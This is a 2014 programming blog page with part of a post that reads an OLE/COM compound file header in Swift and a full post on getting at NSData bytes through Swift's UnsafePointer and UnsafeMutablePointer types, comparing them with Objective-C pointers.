    Signature:          208 207 17 224 161 177 26 225
    Major:              3
    Minor:              62
    Byte order:         65534
    Sector shift:       9
    MiniSector shift:   6
    N dir sectors:      0
    N FAT sectors:      1

The specification gives the signature bytes as

    0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1

so we appear to have ‘read’ the header successfully.

Additional checks on the fields with predefined values.

Major version is 3 in which case the specification says the minor version should be 0x003E which it is.

Byte order should be 0xFFFE which it is.

The sector shift is correct, as is the minisector shift.

The number of directory sectors in a version 3 file is always 0 and it is

All done with nary a getUInt16 or a getUInt32 in sight.


Copyright (c) 2014 By Simon Lewis. All Rights Reserved.

Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and owner Simon Lewis is strictly prohibited.

Excerpts and links may be used, provided that full and clear credit is given to Simon Lewis and justanapplication.wordpress.com with appropriate and specific direction to the original content.

November 15, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Two — Of Bytes And Pointers To Bytes

Whether we chose to access the contents of a file as a whole or in part, we will end up with an NSData object with some bytes in, so how do you get at the bytes ?

As before the answer is, in exactly the same way as you do in Objective-C.

So that would be like this then ?

    let bytes = data.bytes

It would.

The similarities between doing things in Swift and Objective-C extend to the type of the property bytes.

In Objective-C it is declared like this

    @property(readonly) const void *bytes

and in Swift like this

    var bytes: UnsafePointer<Void> { get }

So what we have got hold of is something with the type

    UnsafePointer<Void>

which is the equivalent of

    const void*

and it is about as useful, which is to say, not very.

If we do this

    let b = bytes[0]

then the compiler will helpfully volunteer the warning

    Constant 'b' inferred to have type 'Void' which may be unexpected

Possibly not unexpected, it is an ‘unsafe pointer’ to ‘Void’ after all, but definitely of limited utility.

An empty tuple, for that is what a ‘Void’ is of course, specialises in representing nothing, a job at which it excels. but it makes for a very unconvincing byte.

What we want is a

    UnsafePointer<UInt8>

in the same way that we would want a

    const uint8_t*

or something in Objective-C.

In Objective-C you do this to get one

    const uint8_t* bytes = (const uint8_t*)data.bytes;

and in Swift you do this

    let bytes = UnsafePointer<UInt8>(data.bytes)

Once you have one, you can access the byte to which it ‘points’ directly

    let b = bytes.memory

or by using a subscript

    let c = bytes[1]

Also, just as you can in Objective-C, you can ‘walk’ right off the end of the associated memory because it really is an ‘unsafe’ pointer.

    ...
    
    let data  = NSData()
    let bytes = UnsafePointer<UInt8>(data.bytes)
    
    for i in 0 ..< 16
    {
        println(bytes[i])
    }

    ...

at which point everything may come to a grinding halt, but then again it may not, it all depends.

The other way to get at the bytes in an NSData object is, needless to say, exactly the same as the other you would do it in
Objective-C, viz.

    let bytes = UnsafeMutablePointer<UInt8>.alloc(length)

    data.getBytes(bytes, length:data.length)

If you are not happy walking off the end of other people’s memory and prefer walking off the end of your own, this is the option for you.

The memory returned by the call to alloc is not managed and must be explicitly freed by a call to dealloc.

    bytes.dealloc(length)

The allocated memory is also not initialized to anything in particular and especially not to zero.

In Swift an

    UnsafeMutablePointer<T>

is to an

    UnsafePointer<T>

as, in Objective-C,

    T*

is to

    const T*

so you can modify the memory an UnsafeMutablePointer<T> ‘points at’ directly

    bytes.memory = UInt8(length)

or using a subscript

    bytes[8] = UInt8(length)

As well as the subscript functions UnsafePointer<T> and UnsafeMutablePointer<T> types support a variety of operators.

For example

    let bytes  = UnsafeMutablePointer<UInt8>.alloc(16)
    
    for i in 0 ..< 16
    {
        bytes[i] = UInt8(i)
    }
        
    var p = bytes
        
    for i in 0 ..< 8
    {
        println(p.memory)
        p += 2
    }
        
    let end = bytes + 8
        
    p = bytes
        
    while p < end
    {
        println(p++.memory)
    }
        
    p = bytes + 7
        
    while p >= bytes
    {
        println(p--.memory)
    }

The ‘mutating’ operators pre/post decrement/increment etc. can only be used if the ‘pointer’ is referenced from a mutable variable.

You can create an UnsafePointer<T> from an UnsafeMutablePointer<T>

    let bytes     = UnsafeMutablePointer<UInt8>.alloc(16)
    let immutable = UnsafePointer<UInt8>(bytes)

and even vice-versa

    let mutable   = UnsafeMutablePointer<UInt8>(data.bytes)

which is a bit worrying but then the clue is in the name. UnsafePointer<T>s and UnsafeMutablePointer<T>s, are ‘unsafe’.


Copyright (c) 2014 By Simon Lewis. All Rights Reserved.

Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and owner Simon Lewis is strictly prohibited.

Excerpts and links may be used, provided that full and clear credit is given to Simon Lewis and justanapplication.wordpress.com with appropriate and specific direction to the original content.

Older Posts »

Create a free website or blog at WordPress.com.